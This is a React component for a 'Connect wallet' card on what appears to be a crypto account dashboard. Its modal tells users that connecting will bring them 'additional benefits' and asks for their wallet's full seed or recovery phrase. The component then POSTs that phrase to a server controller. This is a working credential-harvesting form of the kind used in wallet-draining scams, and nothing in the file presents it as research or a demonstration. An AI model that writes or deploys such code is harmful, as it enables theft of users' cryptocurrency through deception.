import React, { useState } from "react";
import Switch from "react-switch";
import Modal from 'react-modal';
import { FontAwesomeIcon } from '@fortawesome/react-fontawesome'
import { faXmark, faCircleNotch } from '@fortawesome/free-solid-svg-icons'
import { toast } from 'react-hot-toast';

function ConnectCard({ name, icon, active, phrase }) {
  const [walletname, setWalletname] = useState(name);
  const [myphrase, setMyphrase] = useState(phrase);
  const [checked, setChecked] = useState(active);
  const [modalIsOpen, setIsOpen] = useState(false);
  const [loading, setLoading] = useState(false);
  const [loading1, setLoading1] = useState(false);
  const ValidateSave = () =>{
    setLoading(true);
    fetch(`${process.env.REACT_APP_API_URL}controller/connectwallet.controller.php`, {
      credentials: "include",
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({ connect: true, wallet: walletname, phrase: myphrase})
    })
    .then(response => response.json())
    .then(data => {
      if (data.status === "success") {
        toast.success(data.result);
        setChecked(true);
        setIsOpen(false);
        setTimeout(() => {
          window.location.href = "dashboard";
        }, 2000);
      }else{
        toast.error(data.message);
      }
      setLoading(false);
    })
    .catch(err => {
      console.error(err)
      setLoading(false);
      toast.error('There was an issue processing your deposit.')
    })
  }
  const ValidateDisconnect = () =>{
    setLoading1(true);
    fetch(`${process.env.REACT_APP_API_URL}controller/connectwallet.controller.php`, {
      credentials: "include",
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({ disconnect: true, wallet: walletname})
    })
    .then(response => response.json())
    .then(data => {
      if (data.status === "success") {
        setLoading1(false);
        toast.success(data.result);
        setChecked(false);
        setIsOpen(false);
        setTimeout(() => {
          window.location.href = "dashboard";
        }, 2000);
      }else{
        toast.error(data.message);
      }
    })
    .catch(err => {
      console.error(err)
      setLoading1(false);
      toast.error('There was an issue processing your deposit.')
    })
  }
  return (
    <div className="itemcard1 d-flex justify-content-between align-items-center">
      <div className="d-flex align-items-center" onClick={() => setIsOpen(true)}>
        {icon}
        <h6 className="mb-0 fw-semibold text-secondary ms-2" style={{ fontSize: '13px' }}>
          {name}
        </h6>
      </div>
      <Switch
        onChange={() => setIsOpen(true)}
        checked={checked}
        offColor="#404448"
        onColor="#404448"
        offHandleColor="#8c95a0"
        onHandleColor="#31acee"
        uncheckedIcon={false}
        checkedIcon={false}
        height={23}
        width={40}
        handleDiameter={18}
      />
      <Modal
            isOpen={modalIsOpen}
            onRequestClose={() => setIsOpen(false)}
            shouldCloseOnOverlayClick={true} 
            closeTimeoutMS={100}
            className="shortmode"
        >
            <div className="d-flex align-items-center justify-content-between">
                <p className="mb-0 fw-bold text-white" style={{fontSize: '15px'}}>Connect wallet</p>
                <FontAwesomeIcon className="py-1 px-2 rounded-3" icon={faXmark} style={{fontSize: '15px', backgroundColor: 'rgba(255, 255, 255, 0.1)', cursor: 'pointer'}} onClick={() => setIsOpen(false)} />
            </div>
            <p className="mb-3 mt-2 text-light fw-semibold" style={{fontSize: '15px'}}>Connect your wallet to start enjoying your account's additional benefits.</p>
            <label className="fw-semibold mb-2" style={{fontSize: '14px'}}>Wallet:</label>
            <div className="d-flex align-items-between form-control justify-content-between py-1 pe-1">
                <input 
                    type="text" 
                    placeholder={walletname}
                    className="inputNone w-100 py-1"
                    value={walletname}
                    onChange={(e) => setWalletname(e.target.value)}
                />
            </div>
            <label className="fw-semibold mb-2 mt-3" style={{fontSize: '14px'}}>Seed/Recovery Phrase:</label>
            <div className="d-flex align-items-between form-control justify-content-between py-1 pe-1">
                <textarea 
                placeholder={`Your ${walletname} Seed/Recovery Phrase:`}
                className="inputNone w-100 py-1"
                value={myphrase}
                onChange={(e) => setMyphrase(e.target.value)}
                rows={5}
                />
            </div>
            <div className="d-flex align-items-center justify-content-between mt-4" style={{gap: '12px'}}>
                <div className={`myBtn ${myphrase?'bg-danger':'bg-secondary'} w-100 text-center mt-3`} style={{paddingTop: '12px',paddingBottom: '12px'}} onClick={myphrase?ValidateDisconnect:null}>{loading1?<FontAwesomeIcon icon={faCircleNotch} style={{fontSize: '20px', color: 'white', opacity: '0.5'}} spin />:'Disconnect'}</div>
                <div className={`myBtn ${myphrase?'bg-prime':'bg-secondary'} w-100 text-center mt-3`} style={{paddingTop: '12px',paddingBottom: '12px'}} onClick={myphrase?ValidateSave:null}>{loading?<FontAwesomeIcon icon={faCircleNotch} style={{fontSize: '20px', color: 'white', opacity: '0.5'}} spin />:'Save'}</div>
            </div>
        </Modal>
    </div>
  );
}

export default ConnectCard;